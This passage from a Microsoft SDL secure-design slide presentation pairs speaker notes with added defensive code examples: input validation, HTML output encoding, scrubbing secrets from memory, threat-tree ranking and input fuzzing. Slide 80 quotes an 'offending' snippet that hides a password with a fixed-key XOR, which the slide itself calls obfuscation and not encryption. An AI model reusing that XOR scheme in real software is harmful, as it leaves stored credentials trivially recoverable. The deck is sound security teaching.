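#include <string.h>

/* Added example, not from the slide: an allow-list check for ^\d{3}-\d{2}-\d{4}$
   (hand-coded, no regex library needed) and HTML encoding of anything echoed back;
   render_greeting is an assumed stand-in for a fixed Welcome.asp. */

static int is_digit(char c) { return c >= '0' && c <= '9'; }

/* Accept exactly ddd-dd-dddd: right length, digits and dashes in the right
   places, and nothing before or after (the ^ and $ anchors). */
int is_valid_ssn(const char *s) {
    static const char pattern[] = "ddd-dd-dddd";
    size_t i;
    for (i = 0; pattern[i] != '\0'; i++) {
        if (s[i] == '\0') return 0;                       /* too short */
        if (pattern[i] == 'd' ? !is_digit(s[i]) : s[i] != '-') return 0;
    }
    return s[i] == '\0';                                  /* reject anything longer */
}

/* Replace the five characters that can change HTML structure.  Returns the number
   of characters written (terminator excluded) or -1 if dst (cap bytes) is too
   small; when cap > 0, dst is always NUL-terminated on return. */
long html_encode(const char *src, char *dst, size_t cap) {
    size_t n = 0;
    if (cap == 0) return -1;
    for (; *src != '\0'; src++) {
        const char *rep = NULL;
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   break;
        }
        size_t len = rep ? strlen(rep) : 1;
        if (n + len >= cap) {                             /* keep room for the NUL */
            dst[n] = '\0';
            return -1;
        }
        if (rep) memcpy(dst + n, rep, len); else dst[n] = *src;
        n += len;
    }
    dst[n] = '\0';
    return (long)n;
}

/* What Welcome.asp should have done: encode the query-string value before
   echoing it, so a name containing markup renders as text instead of running. */
long render_greeting(const char *name, char *out, size_t cap) {
    static const char prefix[] = "Hello, ";
    size_t plen = sizeof prefix - 1;
    if (cap <= plen) return -1;
    memcpy(out, prefix, plen);
    long n = html_encode(name, out + plen, cap - plen);
    return n < 0 ? -1 : n + (long)plen;
}

int main(void) {
    char page[128];
    printf("ssn ok: %d %d\n", is_valid_ssn("123-45-6789"), is_valid_ssn("123-45-678"));
    if (render_greeting("<b>Bob</b>", page, sizeof page) >= 0)   /* constructed input */
        printf("%s\n", page);
    return 0;
}
```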
  • 77. Storing Secrets: storing secrets securely in software is impossible! …But you can raise the bar! Embedded ‘secrets’ don’t stay secret for long
  • 78. Storing Secrets: DPAPI is the recommended method (Crypt[Un]ProtectData; requires Windows 2000 and later) and is preferable to LSA secrets. Easy! You store the encrypted secret and you can back the data up; DPAPI provides an integrity check; no need to run as admin: the account that encrypts the data decrypts the data
  • 79. Storing Secrets in Memory. Process: acquire the data, encrypt it, decrypt it, use it, scrub it. Functions: Crypt[Un]ProtectMemory (requires Windows Server 2003 and later); Rtl[En|De]cryptMemory (now in the Platform SDK); SecureZeroMemory
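The "use it, scrub it" step as an added C example that is not from the slide: secure_zero is a portable stand-in for SecureZeroMemory written here, and check_password is an assumed caller that scrubs its working copy before returning.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the slide: scrubbing a secret after use with a zeroing
   routine the optimizer cannot drop.  secure_zero is a portable stand-in for
   SecureZeroMemory; check_password is an assumed caller. */

/* Write zeros through a volatile pointer: the compiler must perform each store,
   whereas a plain memset() on a buffer that is never read again may be removed
   as a dead store, leaving the secret in memory. */
void secure_zero(void *p, size_t n) {
    volatile unsigned char *v = (volatile unsigned char *)p;
    while (n--) *v++ = 0;
}

/* Return 1 if every byte of p is zero (used to confirm the scrub). */
int is_zeroed(const void *p, size_t n) {
    const unsigned char *b = (const unsigned char *)p;
    unsigned char acc = 0;
    for (size_t i = 0; i < n; i++) acc |= b[i];
    return acc == 0;
}

/* Compare without early exit so the comparison time does not depend on where
   the first differing byte is. */
static int ct_equal(const char *a, const char *b, size_t n) {
    unsigned char diff = 0;
    for (size_t i = 0; i < n; i++) diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* The slide's process in one function: the decrypted secret lives in a local
   buffer only as long as it is needed and is scrubbed on the way out.  The
   "decrypt" step is a plain copy here; DPAPI would supply the real one. */
int check_password(const char *presented, const char *stored) {
    char work[64];
    size_t len = strlen(stored);
    if (len >= sizeof work) return 0;
    memcpy(work, stored, len + 1);                       /* "decrypt it" (stand-in) */
    int ok = strlen(presented) == len && ct_equal(work, presented, len);   /* "use it" */
    secure_zero(work, sizeof work);                      /* "scrub it" */
    return ok;
}

int main(void) {
    printf("match: %d, mismatch: %d\n",
           check_password("hunter2", "hunter2"),        /* constructed sample values */
           check_password("hunter3", "hunter2"));
    return 0;
}
```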
  • 80. A Related Issue – “Encraption”: XOR is not your friend! Don’t roll your own: use CryptoAPI or System.Security.Cryptography. Evaluate usage: are the algorithms appropriate? Document all uses of crypto. The offending code:
        const TCHAR szDecrypt[] = TEXT("susageP");
        // "Decrypt" the password: XOR with a fixed 7-character key is obfuscation, not encryption
        dwSize = (dwSize / sizeof(TCHAR)) - 1;
        for (dwType = 0; dwType < dwSize; dwType++) {
            lpRasDialParams->szPassword[dwType] ^= szDecrypt[dwType % 7];
        }
  • 81. The Threat Modeling ProcessCreate an application modelUse UML or DFDCategorize threats by using STRIDECreate a threat treeRank threats by using DREAD
  • 83. KeyThreat (Goal)Sub-threatConditionCreate Threat TreeParse RequestSTRIDESTRIDEThreat (Goal)Threat (Goal)STRIDEThreat (Goal)ThreatThreatThreatDREADConditionSub-threatDREADConditionCondition
  • 84. Rank Threats Using DREAD
    Damage potential
    Reproducibility
    Exploitability
    Affected users
    Discoverability
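The threat-tree and DREAD steps from slides 81 to 84, as an added Python illustration that is not the presentation's code. Assumptions the slides do not state: each DREAD factor is rated 1 to 10 and a condition's rating is the average of the five; a goal is live when any sub-threat is live, and an AND sub-threat only when every condition under it is unmitigated. The "Parse Request" threats and their scores are constructed.

```python
from dataclasses import dataclass, field

STRIDE = {"S": "Spoofing", "T": "Tampering", "R": "Repudiation",
          "I": "Information disclosure", "D": "Denial of service",
          "E": "Elevation of privilege"}


@dataclass
class Condition:
    """Leaf of the tree: one condition the attacker needs. DREAD is rated
    here, each factor 1-10 (assumed scale, averaged)."""
    name: str
    damage: int
    reproducibility: int
    exploitability: int
    affected_users: int
    discoverability: int
    mitigated: bool = False

    def dread(self) -> float:
        factors = (self.damage, self.reproducibility, self.exploitability,
                   self.affected_users, self.discoverability)
        return round(sum(factors) / len(factors), 1)

    def reachable(self) -> bool:
        return not self.mitigated

    def conditions(self) -> list:
        return [self]


@dataclass
class Threat:
    """Threat (goal) or sub-threat tagged with a STRIDE letter. An OR node is
    live if any child is; an AND node (needs_all) only if every child is."""
    name: str
    stride: str
    children: list = field(default_factory=list)
    needs_all: bool = False

    def category(self) -> str:
        return STRIDE[self.stride]

    def reachable(self) -> bool:
        live = [child.reachable() for child in self.children]
        return all(live) if self.needs_all else any(live)

    def conditions(self) -> list:
        return [c for child in self.children for c in child.conditions()]


def rank(tree: Threat) -> list:
    """Unmitigated conditions, highest DREAD first: the order to address them."""
    live = [c for c in tree.conditions() if not c.mitigated]
    return sorted(live, key=lambda c: c.dread(), reverse=True)


def mitigate(tree: Threat, condition_name: str) -> Threat:
    """Record a mitigation for a condition, then re-evaluate the tree."""
    for c in tree.conditions():
        if c.name == condition_name:
            c.mitigated = True
    return tree


def sample_tree() -> Threat:
    """Constructed threat tree for a hypothetical 'Parse Request' process."""
    return Threat("Attacker reads or alters data through Parse Request", "T", [
        Threat("Inject SQL through a request field", "T", needs_all=True, children=[
            Condition("Request input not validated", 9, 9, 8, 8, 9),
            Condition("Query built by string concatenation", 9, 9, 8, 8, 7),
        ]),
        Threat("Exhaust the parser with oversized requests", "D", [
            Condition("No request size limit", 5, 10, 9, 10, 8),
        ]),
        Threat("Take over another user's session", "I", needs_all=True, children=[
            Condition("Session id predictable", 8, 6, 6, 7, 5),
            Condition("Session cookie sent over plain HTTP", 8, 7, 7, 7, 8),
        ]),
    ])
```

Mitigating one condition of an AND sub-threat (for instance moving to parameterized queries) closes that whole branch, while the ranking of what remains tells the team what to fix next.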
  • 85. Best Practices: Test Security
    Involve test teams in projects at the beginning
    Explicitly test security, not just features
    Know your enemy and know yourself: what techniques and technologies will hackers use? What techniques and technologies can testers use?
    Use threat modeling to develop security testing strategy
    Analyze and prioritize test strategies
    Attack!!!!
  • 86. Best Practices: Test Security
    Think Evil. Be Evil. Test Evil.
    Automate attacks with scripts and low-level programming languages
    Submit a variety of invalid data
    Delete or deny access to files or registry entries
    Test with an account that is not an administrator account
    Perform code reviews
  • 87. Start Right AwayIt’s true that if you have 1000 or more developers, you’ll probably want to eventually work your way up to the Dynamic level of the Optimization Model (where we see ourselves), but the 5-person PHP shop could greatly benefit from implementing the SDL at the Standardized level. At the Standardized level, you perform high-ROI security activities such as validating input and encoding output to defend against cross-site scripting attacks, using stored procedures to defend against SQL injection attacks, and fuzzing your application inputs to find unknown errors. These all sound pretty applicable to a 5-person PHP shop to me!
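Slides 85 to 87 recommend automating attacks with scripts, submitting a variety of invalid data and fuzzing application inputs. The mutation fuzzer below is an added Python illustration, not from the presentation: the request parser, its bug and the seed inputs are constructed for the example, and BadRequest is assumed to be the parser's contract for malformed input, so only other exceptions count as findings.

```python
import random
import string


class BadRequest(ValueError):
    """The only exception a well-behaved parser may raise for bad input."""


def parse_request_buggy(raw: str) -> dict:
    """Constructed bug: a field without '=' raises an unhandled ValueError."""
    fields = {}
    for pair in raw.split("&"):
        key, value = pair.split("=", 1)   # ValueError when '=' is missing
        fields[key] = value
    return fields


def parse_request_fixed(raw: str) -> dict:
    """Same parser after triage: every malformed shape maps to BadRequest."""
    if len(raw) > 4096:
        raise BadRequest("request too long")
    fields = {}
    for pair in raw.split("&"):
        if "=" not in pair:
            raise BadRequest(f"field without '=': {pair!r}")
        key, value = pair.split("=", 1)
        if not key:
            raise BadRequest("empty field name")
        fields[key] = value
    return fields


SEEDS = ["name=alice&ssn=123-45-6789", "name=bob"]   # constructed seed inputs
SPECIAL = ["", "&", "=", "&&", "%00", "'", "<", "\n", "A" * 5000]


def mutations(seed: str, rng: random.Random):
    """Yield every single-character deletion, then 200 random mutations."""
    for i in range(len(seed)):                       # systematic deletion pass
        yield seed[:i] + seed[i + 1:]
    for _ in range(200):                             # random pass
        s = seed
        op = rng.randrange(4)
        pos = rng.randrange(len(s) + 1)
        if op == 0:     # insert a special token
            s = s[:pos] + rng.choice(SPECIAL) + s[pos:]
        elif op == 1:   # overwrite one character
            s = s[:pos] + rng.choice(string.printable) + s[pos + 1:]
        elif op == 2:   # truncate
            s = s[:pos]
        else:           # duplicate a tail slice
            s = s + s[pos:]
        yield s


def fuzz(target, seeds=SEEDS, rng_seed=1) -> list:
    """Run target over mutated inputs and return (input, exception) pairs
    for anything other than BadRequest; the seed keeps runs reproducible."""
    rng = random.Random(rng_seed)
    crashes = []
    for seed_input in seeds:
        for candidate in mutations(seed_input, rng):
            try:
                target(candidate)
            except BadRequest:
                pass
            except Exception as exc:   # unexpected exception: a bug to triage
                crashes.append((candidate, repr(exc)))
    return crashes
```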

Editor's Notes

  • #3: So you've decided to get serious about security… Photo credits: http://www.flickr.com/photos/declanjewell/2472470758/
  • #4: Maybe you need some heavy security. Photo credits: http://www.flickr.com/photos/anonymouscollective/2291896028/
  • #5: This elegant system allows more than one person to open the gate, each using their own key. Photo credit: http://www.flickr.com/photos/psd/
  • #6: Overdone security can kill a system. If there is too much impedance, smart users will do their best to get around all the locks. Too much security leads to systems that are hard to administer and maintain. Photo credit: http://www.flickr.com/photos/sunshinecity/
  • #7: In this presentation we will complete a high-level overview of the SDL and the important role it fulfills in the design stage of an application's software development lifecycle. We will also review the secure design principles employed within the SDL that have helped Microsoft deliver safer and more trusted applications to its customers since the inception of the SDL in 2004.
  • #12: After the requirements for a solution have been identified in the early stages of an application's software development lifecycle, the next step is to design and architect a solution that satisfies those requirements. Developing trusted applications requires that sound security and privacy decisions be made early in the design phase, because decisions made at this stage strongly influence subsequent efforts in the later stages of the software development lifecycle and the final state of the application. Microsoft has found that by adopting this approach, application development costs (such as those required to address and resolve security and privacy issues) are significantly reduced compared to considering security and privacy later in the SDLC, or not at all. This is because applications developed against more secure and privacy-aware designs tend to be exposed to fewer threats and contain fewer vulnerabilities. Microsoft helps ensure that security and privacy considerations are incorporated into its application design efforts through the SDL by applying the following secure design principles. In the remainder of this presentation, I will briefly review each of these principles and mention how they can be applied to better ensure that application designs consist of sufficient and effective security and privacy best practices.
  • #13: The attack surface of an application is the portion of the program (code and functionality) that is exposed to a particular person or another program. For example, an open network port and a user interface are both part of an application's attack surface. One of the most effective secure design principles that can be used to protect an application from malicious acts is attack surface reduction (ASR). The principle of ASR is to minimize the attack surface while still satisfying the functional requirements of the application. Secure coding will reduce, but not eliminate, the vulnerabilities in your application; by reducing the attack surface, however, you minimize the number of vulnerabilities that the attacker can discover and attempt to exploit.
  • #14: Here's an example of attack surface. Let's pretend we are a home security company and we want to protect this home from a burglar breaking in and stealing the valuables inside. What is our attack surface? (Mouse click) At the front of the house we have several windows and doors that a burglar could use or exploit. (Mouse click) At the side of the house we also have a couple of windows a burglar could use or exploit. (Mouse click) And finally, do not forget the chimney! Like this house, our applications have various points that are exposed to people or other programs and computers. Each one of these can be exploited by a malicious user, and with attack surface reduction our goal is to minimize the number of potential vulnerabilities a malicious person could exploit.
  • #15: In order to reduce the attack surface of an application, application designers need to first know how to measure the attack surface. The attack surface is defined by the set of interfaces, or entry points, to the program. Attack surface analysis (ASA) is the process of identifying and understanding all of the entry points that comprise the attack surface, and is successfully performed by enumerating all of the interfaces, protocols, and code execution paths. Another important element of ASA is understanding the trust levels required to access each entry point. For each entry point, you must consider the importance of the feature that it enables. For features that are not important to a vast majority of the users, turn the feature off, disable it by default, or do not even install it by default; force the users that really want or need the feature to take explicit action to obtain that feature. This way, any vulnerability related to that specific feature will affect a very small percentage of the product's user base. Next consider which specific classes of users require that feature, and then restrict its use to those classes. For example, do not default to making the feature remotely accessible, do not default to allowing anonymous access, do not default to running with more privilege than is needed, etc. A significant aspect of ASR is restricting who has access to a particular product feature, and how such users may obtain and use that access.
  • #16: ASA is an iterative process: for each feature that you analyze, you must also analyze all of its sub-features. And again, you want to restrict access to features as much as possible.For example, if your application in general processes files, configure it to read only the most common file types that it accepts; force the user to explicitly configure it to process the less commonly used file types. Also ensure that when the program writes files that it sets the proper ownership and rights on the file; do not create executable files unless those files must be executable.Disable older, faulty, and less used protocols, such as SSL V2 and PCT. Force users to use more robust alternatives, such as SSL V3 and TLS, or force them to explicitly configure applications to accept those older protocols.If your application provides a service or implements a protocol, restrict the commands that it accepts by default to those that are most commonly needed and used. Force the administrator to explicitly configure other commands if they want to accept them.
  • #17: While ASR focuses on restricting access, it is not strictly about disabling or not installing features. For instance, instead of using UDP as a network protocol, use TCP, which can be more easily secured. Or instead of making a network service Internet accessible, make it accessible only on the local network unless wider access is needed. You can also use ASR to enforce the principle of least privilege, which will be discussed later, by designing the program to run with the lowest set of privileges required to perform its function.
  • #18: Here are some examples of how ASR has been applied in the latest versions of Microsoft products that have previously encountered security complications: authentication before interaction achieves ASR by disallowing anonymous access by default; firewall on by default closes all but specifically required ports; many services are now off by default, and when turned on are running as low privileged network services; when services are necessary out-of-the-box, they are restricted to localhost access; and functions or features that have been proven to introduce unnecessary and undesirable risk in the past are also now turned off by default. Note: "Network service" refers to the lesser privileged account running the service. Therefore an attacker that defeats the security of IIS 6 obtains relatively few and weak privileges, whereas that attacker defeating the security of IIS 4 or 5 was rewarded with Admin privileges.
  • #19: In addition to the SDL design principle of attack surface reduction, another core principle that needs to be considered when developing trusted software is that of privacy. Privacy, like security, is another key factor when developing trusted applications; however, they are not the same.Privacy focuses on the control and choices users have regarding the use, collection and distribution of their personal information. Security, on the other hand, is applied to protect assets, including personal information, from threats.Again, when designing trusted applications, both privacy and security together need to be evaluated. The SDL helps application designers create more privacy-aware applications by establishing during the design phase privacy best practices, standards, and guidelines.
  • #20: A common myth regarding the relationship between security and privacy is that if a system is sufficiently secure then privacy is also preserved. However, this may not always be the case. A security breach can certainly result in a loss of privacy (for instance, credit card information may be accessed by unauthorized users), but it is also possible for a secure system to cause a loss of privacy without a breach. Consider this secure, but privacy-violating scenario: securely storing personal information and then sending that information over a securely encrypted communication channel to third parties, without properly notifying and receiving consent from the user, may be securely implemented but obviously does not take into consideration the rights of the user; some of those rights may have legal implications! In this scenario, the user's privacy is compromised by the inappropriate act of a user or application rather than by a security breach.
  • #21: In the previous slide I presented the primary privacy objectives associated with developing trusted applications. I mentioned how certain behaviors of an application could create legal obligations that need to be met and how those behaviors could also block the deployment of an application. The table on this slide shows some of the common application behaviors and the legal obligations and blocked deployment scenarios that could arise because of those behaviors. For example, if an application is designed for users under 13 years of age, then legal obligations, such as those described in the Children's Online Privacy Protection Act (COPPA), must be met. As another example, if an application transfers personal information, then satisfying legal obligations from the Gramm-Leach-Bliley Act (GLBA) and the Health Insurance Portability and Accountability Act could be required. Application designers need to understand the behavior of their applications and the corresponding privacy concerns implied by those behaviors. Microsoft has developed the Microsoft Privacy Guidelines for Developing Products and Services to help application development teams better understand privacy implications associated with application behavior.
  • #22: In order to help application development teams better develop privacy-compliant products and services, Microsoft has released the Microsoft Privacy Guidelines for Developing Products and Services. This document provides common definitions and rules for developing more privacy-compliant products and services. The document is divided into two sections: the first section contains definitions and key concepts including data types, notice, consent, etc. The second section contains rules categorized by specific development scenarios, such as collection and transfer of personally identifiable information (PII), storage of data on the customer's system, and onward transfer of PII to third parties. There are also specific scenarios for products or services that collect age or are attractive to children, and for products that are deployed in enterprises. Products deployed in enterprises are a special case, because the developers' obligation transitions from the user to the enterprise administrator; you need to enable the enterprise administrator to fulfill their company's privacy policies. At Microsoft, our goal is that our customers will be empowered to control the collection, use and distribution of their personal information through our products and services, and so any externally released application or Web site must comply with the clearly defined rules and guidelines set forth in the Microsoft Privacy Guidelines for Developing Products and Services. Within the SDL, a privacy bug bar is defined and is used to measure the impact of non-compliance with the rules of the Microsoft Privacy Guidelines for Developing Products and Services.
Downloading the Microsoft Privacy Guidelines: the current version (version 2.1a, released 04/26/2007) of the Microsoft Privacy Guidelines for Developing Products and Services can be downloaded from http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en. A link to the most current version of this document can be found under the privacy section of the SDL training and resources link, located at http://msdn.microsoft.com/en-us/security/cc448120.aspx.
  • #23: In this section of the presentation, I will briefly explain the process called threat modeling, which Microsoft uses through the SDL process to understand and address any and all threats to an application. It is important not to confuse threats with vulnerabilities. A threat is simply what an adversary might try to do to compromise a protected resource in the system. A vulnerability is a specific way that a threat is exploitable based on an unmitigated attack path.A person in an application design group with security expertise typically leads the threat modeling activities, which begin with identification of all potential threats to the system and the assets accessed by the system. Threat models must be revisited periodically to account for new threats resulting from new and evolving attack techniques.Please recall that this portion of the presentation is meant only to provide you with a brief introduction to the threat modeling process.
  • #24: At a high level, threat modeling consists of a number of activities conducted during the design phase of the application development process. These activities begin by envisioning the application as it will be used by typical users in a typical environment, and continue by identifying all of the potential threats to the application and to assets accessed via the application. During this process all security-related assumptions and external dependencies are documented, as are the "external security notes": notes to help users and administrators understand the security boundaries of the application currently being developed. The threat modeling process continues by creating a number of data flow diagrams (DFDs), which model the trust boundaries of the application and its components and the flow of data between the application and its environment, as well as the flow of data between components within the application. Now that you have a completed model, the next step in the threat modeling process is to determine the types of threats facing the application (from the malicious user's perspective) and list all of the DFD elements. The DFD elements represent the application assets that need to be protected from attack. Knowing what needs to be protected, and how it will be attacked, enables you to choose appropriate mitigations for each threat. Note that we are still in the design stage of application development! We are now designing security controls into the product based upon the most likely threats; the most cost-effective juncture to address such considerations. At this point, we need to review the threat model, the DFD elements (a.k.a. 'assets') that need protection, and the mitigations or defenses/countermeasures, to ensure that the mitigations do indeed protect the assets from the threats. If anything is found to be amiss, this is the time to start from the beginning of the threat-modeling process once again.
  • #25: Microsoft has published the threat modeling tool it uses internally to help automate aspects of the threat modeling process. The tool is available for download at http://www.microsoft.com/downloads/details.aspx?FamilyID=62830f95-0e61-4f87-88a6-e7c663444ac1&displaylang=en.
  • #26: In addition to attack surface reduction, privacy and threat modeling, another key design principle that should be leveraged to create trusted applications is the principle of defense in depth. A key perspective of defense in depth is beginning the application design process with the mindset that all applications and hardware will ultimately fail. If you go back to the burglar breaking into a house scenario, all the doors and windows to the house could be locked to keep the burglar out. Those might fail, so an alarm system could also be installed. The alarm system might fail, so the valuables inside the house could be placed inside a safe, and so on. In the context of designing and developing trusted applications, this means that the privacy features (e.g., cryptographic algorithms used to protect sensitive or personal data) and security features (e.g., firewalls) defending our applications will inevitably fail. Unfortunately most applications today are designed and implemented in such a way that the application can be compromised when a single, and often only, layer of defense fails or is breached. With the defense in depth principle, applications are built in such a way that if one defense layer fails, there are additional layers of defense that can provide protection to the application. Think about it this way: if a malicious user is going to compromise our application, then we should make their job as difficult as possible by implementing multiple layers of defense that they need to breach instead of just one. That is defense in depth!
  • #27: The easiest way application designers can get started with this powerful principle is to evaluate their application designs and ask themselves: if one layer of defense is breached, what other layers can provide additional protection to the application and the assets that it is protecting? Here is an example of defense in depth and how this principle can be leveraged to make trusted applications more difficult to compromise. Consider a malicious user who wants to gain unauthorized access to sensitive data stored on a server, such as credit card numbers or other personally identifiable information (PII). (Mouse click) Again, most applications today are designed and developed with a single layer of defense in mind, typically a firewall. (Mouse click) If a malicious user is able to breach this single layer of defense, then that user is able to compromise the application. (Mouse click) On the other hand, an application designed with the defense in depth principle has multiple layers of defense protecting it. For instance, input validation (application-level), smart card access (host-level), and IP security (network-level) are examples of additional layers of defense that could protect an application. (Mouse click) So now, even if one layer of defense fails, there are additional layers of defense that can provide protection to the application and the attack is halted. In our example, while both the firewall and the second defense layer failed, the 3rd and 4th layers of defense were still able to halt the attack, thereby protecting the sensitive data.
  • #29: The previous SDL secure design principle, defense in depth, started with the notion that all software and hardware would fail at some point. With the least privilege principle, we assume that all applications will be compromised. However, through employing the principle of least privilege, should a malicious user compromise an application, the amount of damage that may be inflicted is limited.
  • #30: Pretend that we have a malicious user and an application running on a system that the user is hoping to compromise. (Mouse click) In this example, the application is running in an administrative or local system state. That is, the application has the same rights as any administrative user on the system. (Mouse click) When our malicious user compromises the application, because that application is running in an administrative state, the malicious user can now use the application to perform malicious actions, such as changing system passwords, reading users' files, and accessing any data on that system. In fact, because the malicious user is essentially an administrator on that system through the compromised application, the user can do whatever is desired. (Mouse click) Now see what happens when a malicious user compromises the same application, but this time the application is running using the least privilege principle. That is, it is running in a lower privileged state, such as a network service. (Mouse click) Now when the malicious user compromises the application, the malicious user cannot perform malicious actions, such as changing system passwords, reading user files, etc., because the application that the malicious user is using to perform those nefarious actions does not have the privileges (i.e., access) to do so. In applying the least privilege principle, we have greatly limited the potential damage a malicious user can inflict on a compromised system. It is still not an ideal situation; we would rather the malicious user not be able to compromise the application at all, but if the malicious user does compromise the application, then at least we can limit the amount of damage that may be inflicted.
  • #31: Here are a few tips when using least privilege to design applications that are to be more resilient to malicious attack. Think minimally. Ask yourself, what is the minimum access your application needs to function correctly? If your application requires higher privileges, elevate those privileges only when required and release those privileges immediately after the purposes of those privileges have been satisfied.
  • #32: In the previous section I provided an overview of the principle of least privilege. In this section, I will present another important, and the last, principle, known as "secure defaults." Recall that with the attack surface reduction principle, any non-critical part of an application that was exposed to a human or system was removed or disabled by default to reduce the number of exposed vulnerabilities a malicious user could use to compromise an application. The secure defaults principle considers the situation where part of an application needs to be exposed to a human or system by default, and how this may be done more safely and securely. Microsoft, through the SDL process, has used this principle to better ensure that customers have safer experiences with our applications out-of-the-box, rather than only after extensive and often manual configuration activities have been performed. With this principle, it is left to the user to reduce the security and privacy of an application, and not left to Microsoft or the manufacturer of the software. Malicious users commonly scan networks for applications or devices that are known to be insecure by default, such as wireless routers and web servers. These applications are easy to compromise. With secure defaults, this ability is taken away from malicious users, which helps keep your customers safer.
  • #33: Regarding the secure defaults principle, designers need to evaluate the various parts of their application from the perspective of what is the most secure or privacy-aware manner in which each part may be configured. Here are some examples: Firewall. Microsoft Windows can be configured with the firewall on or off; the latest and future versions of Windows come with the firewall turned on by default. SSL Socket. If your application can read data through an SSL socket, then by default it should be configured to use only the latest secure protocol versions, such as v3, TLS, etc., and avoid insecure versions, such as v2. User Access Over Anonymous or Authenticated Channels. If your application has the option of allowing users to access it over anonymous or authenticated channels, then by default it should use authenticated channels. Password Complexity. If your application can require users to have complex passwords, then that feature should be enabled by default. Storing User Passwords as Hashes. If your application can store user passwords as hashes or clear text, then it should store passwords as hashes by default.
  • #36: This concludes our discussion on the SDL Secure Design Principles. In this presentation we completed a high-level overview of the SDL and the important role it fulfills in the design stage of an application's software development lifecycle. We noted that when security and privacy considerations are sufficiently and effectively incorporated early into an application's software development lifecycle, such as in the design phase, the overall number of threats an application is exposed to and the number of vulnerabilities an application may contain will be substantially reduced. Additionally, the overall cost of maintaining trusted applications will be reduced, because the number of remediation efforts required to address post-deployment security and privacy issues will most likely be reduced. Finally, we explored the core secure design principles leveraged by the SDL, which are: Attack Surface Reduction. This principle emphasizes the importance of reducing the overall number of possible points in an application that malicious users can use to attack that application. Basic Privacy. This principle concentrates on the importance of fulfilling certain legal obligations, increasing customer trust and unblocking deployments based on an application's behavior. Threat Modeling. This technique gives application designers a structured and methodical way of understanding and analyzing threats to an application. Defense in Depth. This principle focuses on how the use of multiple layers of defense for an application greatly reduces the likelihood that a malicious user will be able to exploit it. Least Privilege. This principle emphasizes the importance of limiting the amount of damage a malicious user can inflict in the event an application is compromised. Secure Defaults. Finally, this principle concentrates on better ensuring customers' safe experiences with an application out-of-the-box rather than being required to perform an extensive series of custom configurations.
  • #39: This diagram compares the security engineering steps of the SDL to the software engineering steps of the classic SDLC (software development lifecycle). The blue outer ring represents traditional software development and the orange inner circle represents the SDL. Notice that the security engineering steps are incorporated into the existing software engineering steps and that any engineering task can be supplemented with a security engineering task.Both of these development lifecycles, or collections of engineering steps, apply to the software development lifecycle regardless of the particular development model you use (for example waterfall, Agile, etc.) The small pewter colored circles represent the various milestones in your model and are an excellent time for ensuring that the steps in both the security and software development lifecycles have been adequately addressed.The SDL process has been documented and published in The Security Development Lifecycle book (Microsoft Press 2006, ISBN: 9780735622142), and the official Web site can be accessed at http://www.microsoft.com/sdl.
  • #40: This slide provides additional information and links if you would like to learn more about Microsoft’s threat modeling process.
  • #41: Microsoft also has a security developer center located at http://msdn.microsoft.com/security where developers can find a wealth of resources, including guidance and tools, to help them build safer applications using Microsoft technologies and platforms.
  • #42: Visit the SDL Blog to get the most current ideas and thoughts from Microsoft SDL team members.Visit Michael Howard’s Blog to read all about how security can be effectively incorporated into the software development process from the author of the popular book, Writing Secure Code (Howard, Michael and David LeBlanc, Microsoft Press, Redmond, Washington, 2003).
  • #45: This section provides additional slides, materials and information to supplement the main contents of the presentation.